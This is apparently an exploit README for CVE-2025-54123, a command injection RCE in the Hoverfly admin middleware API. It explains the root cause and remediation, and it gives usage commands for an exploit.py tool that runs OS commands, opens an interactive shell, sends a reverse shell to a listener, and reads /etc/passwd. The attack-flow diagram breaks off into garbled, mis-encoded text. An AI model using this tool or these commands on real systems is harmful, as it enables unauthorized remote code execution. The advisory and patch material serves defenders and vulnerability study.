## https://sploitus.com/exploit?id=F353302B-87A7-5F01-A538-3E5379B2E7FC
# CVE-2025-54123 โ Hoverfly Middleware API Remote Code Execution
> **Authenticated RCE via OS Command Injection in Hoverfly โค 1.11.3**
## Vulnerability Overview
| Property | Value |
|-----------------|-----------------------------------------------------------------------|
| **CVE ID** | [CVE-2025-54123](https://nvd.nist.gov/vuln/detail/CVE-2025-54123) |
| **CVSS Score** | **9.8 โ Critical** |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CWE** | CWE-78 (OS Command Injection), CWE-20 (Improper Input Validation) |
| **Product** | [Hoverfly](https://github.com/SpectoLabs/hoverfly) โ Open-source API simulation tool |
| **Affected** | All versions up to and including **1.11.3** |
| **Fixed In** | **1.12.0** ([patch commit](https://github.com/SpectoLabs/hoverfly/commit/17e60a9bc78826deb4b782dca1c1abd3dbe60d40)) |
| **Advisory** | [GHSA-r4h8-hfp2-ggmf](https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf) |
---
## Technical Analysis
Here's Case Study deep dive and technical analysis as white box and black box prespective
https://medium.com/@phantom_hat/cve-2025-54123-hoverfly-1-11-3-command-injection-rce-case-study-patch-diffing-aacc092f7f3a
### Attack Surface
Hoverfly exposes a RESTful admin API (default port `8888`) for managing simulation configurations. The middleware management endpoint at **`/api/v2/hoverfly/middleware`** accepts a JSON body with `binary` and `script` fields that define an external middleware process.
### Root Cause
The vulnerability is born from a combination of **three code-level flaws**:
1. **Insufficient Input Validation** โ [`middleware.go:93-96`](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/middleware.go#L93): The `SetBinary()` function accepts the `binary` parameter without any validation or sanitisation, allowing an attacker to specify arbitrary executables (e.g., `bash`).
2. **Unsafe Command Execution** โ [`local_middleware.go:14-19`](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/local_middleware.go#L13): The middleware is executed via `exec.Command()` with the attacker-controlled `binary` and `script` values passed directly as arguments, enabling OS command injection.
3. **Immediate Execution During Testing** โ [`hoverfly_service.go:173`](https://github.com/SpectoLabs/hoverfly/blob/master/core/hoverfly_service.go#L173): When the middleware is set via the API, Hoverfly immediately tests the middleware by executing it, triggering the injected command at configuration time rather than at proxy-intercept time.
### Attack Flow
```
Attacker Hoverfly (โค 1.11.3)
โ โ
โโโโ POST /api/token-auth โโโโโโโโโโโโโโ>โ (1) Authenticate
โโ (2) Inject payload
โ { "binary": "bash", โ
โ "script": "" } โ
โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ exec.Command("bash", tmpScript) โโ (3) Immediate execution
โ โ โ attacker command runs as โโ
โ โ the Hoverfly process user โโ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ
โ/CVE-2025-54123.git
cd CVE-2025-54123
pip install -r requirements.txt
```
### Modes of Operation
#### Check-Only Mode
Verify target reachability and authentication without exploitation:
```bash
python3 exploit.py -u http://target:8888 -U admin -P -C
```
#### Single Command Execution
Execute a single OS command on the target:
```bash
python3 exploit.py -u http://target:8888 -U admin -P -c 'id'
```
#### Interactive Pseudo-Shell
Drop into a persistent shell session:
```bash
python3 exploit.py -u http://target:8888 -U admin -P -i
```
#### Reverse Shell
Send a reverse shell to your listener:
```bash
# Terminal 1 โ start listener
nc -lvnp 4444
# Terminal 2 โ launch exploit
python3 exploit.py -u http://target:8888 -U admin -P --revshell 10.0.0.1:4444
```
#### Verbose Mode with Proxy
Route traffic through Burp Suite for inspection:
```bash
python3 exploit.py -u http://target:8888 -U admin -P -c 'cat /etc/passwd' --proxy -v
```
### Full Flag Reference
| Flag | Description | Default |
|---------------------|------------------------------------------|-----------|
| `-u`, `--url` | Target Hoverfly URL | Required |
| `-U`, `--username` | Admin username | Required |
| `-P`, `--password` | Admin password | Required |
| `-c`, `--command` | OS command to execute | โ |
| `-C`, `--check` | Check-only mode (no exploitation) | `false` |
| `-i`, `--interactive` | Interactive pseudo-shell | `false` |
| `--revshell` | Reverse shell `LHOST:LPORT` | โ |
| `--proxy` | Route through `127.0.0.1:8080` | `false` |
| `--timeout` | Request timeout (seconds) | `15` |
| `-v`, `--verbose` | Enable verbose output | `false` |
---
## Remediation
| Action | Details |
|--------|---------|
| **Upgrade** | Update Hoverfly to **v1.12.0** or later, where the set middleware API is disabled by default |
| **Network Segmentation** | Restrict access to the Hoverfly admin API (port `8888`) to trusted networks only |
| **Authentication** | Use strong, unique passwords for the Hoverfly admin API |
| **Monitoring** | Monitor for unexpected `PUT` requests to `/api/v2/hoverfly/middleware` |
### Patch Details
The fix in [commit `17e60a9`](https://github.com/SpectoLabs/hoverfly/commit/17e60a9bc78826deb4b782dca1c1abd3dbe60d40) disables the set middleware API by default. Subsequent changes to documentation ([commit `a9d4da7`](https://github.com/SpectoLabs/hoverfly/commit/a9d4da7bd7269651f54542ab790d0c613d568d3e)) make users aware of the security implications of exposing this endpoint.
---
## References
- [NVD โ CVE-2025-54123](https://nvd.nist.gov/vuln/detail/CVE-2025-54123)
- [GitHub Security Advisory โ GHSA-r4h8-hfp2-ggmf](https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf)
- [Vulnerable Code โ hoverfly_service.go#L173](https://github.com/SpectoLabs/hoverfly/blob/master/core/hoverfly_service.go#L173)
- [Vulnerable Code โ middleware.go#L93](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/middleware.go#L93)
- [Vulnerable Code โ local_middleware.go#L13](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/local_middleware.go#L13)
- [Patch Commit โ 17e60a9](https://github.com/SpectoLabs/hoverfly/commit/17e60a9bc78826deb4b782dca1c1abd3dbe60d40)
---
## Disclaimer
> **This tool is provided for authorized security testing and educational research purposes only.**
> Unauthorized access to computer systems is illegal under the Computer Fraud and Abuse Act (CFAA)
> and equivalent laws worldwide. The author assumes no liability for misuse of this software.
> Always obtain explicit written permission before testing any system you do not own.
---
## Project Structure
```
CVE-2025-54123/
โโโ Exploit/
โ โโโ exploit.py # Polished exploit
โ โโโ raw_exploit.py # Original raw PoC
โโโ Images/ # Research screenshots
โโโ Reference/ # Reference exploits for study
โโโ requirements.txt # Python dependencies
โโโ README.md # This file
```
---
## Author
**Phantom Hat** โ Security Researcher
---
*This research was conducted as part of a vulnerability case study for educational purposes.*